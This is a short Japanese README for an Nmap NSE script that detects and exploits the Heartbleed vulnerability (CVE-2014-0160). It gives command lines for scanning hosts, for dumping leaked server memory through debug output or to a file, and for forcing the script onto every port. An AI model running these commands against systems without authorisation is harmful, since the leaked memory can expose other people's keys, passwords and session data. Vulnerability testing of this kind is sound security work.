
Heartbleed/CVE-2014-0160を発見・悪用するNmap NSEスクリプト。
Heartbleed/CVE-2014-0160 を発見・悪用する Nmap NSE スクリプト。このスクリプトは現在、基本的に Patrik Karlsson が作成したものに、自身のスクリプトからいくつかの小さな変更を移植したものです。
これはすべての SSL、FTP、SMTP、および/または XMPP ポートで実行されます。
$ nmap --script ./openssl-heartbleed.nse host.tld
漏洩したメモリのダンプは、-d フラグを使用して Nmap のデバッグレベルを上げることで有効になります。
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
サービスが検出されたかどうかに関係なく、すべてのポートでスクリプトを強制的に実行します。
$ nmap --script +./ssl-heartbleed.nse host.tld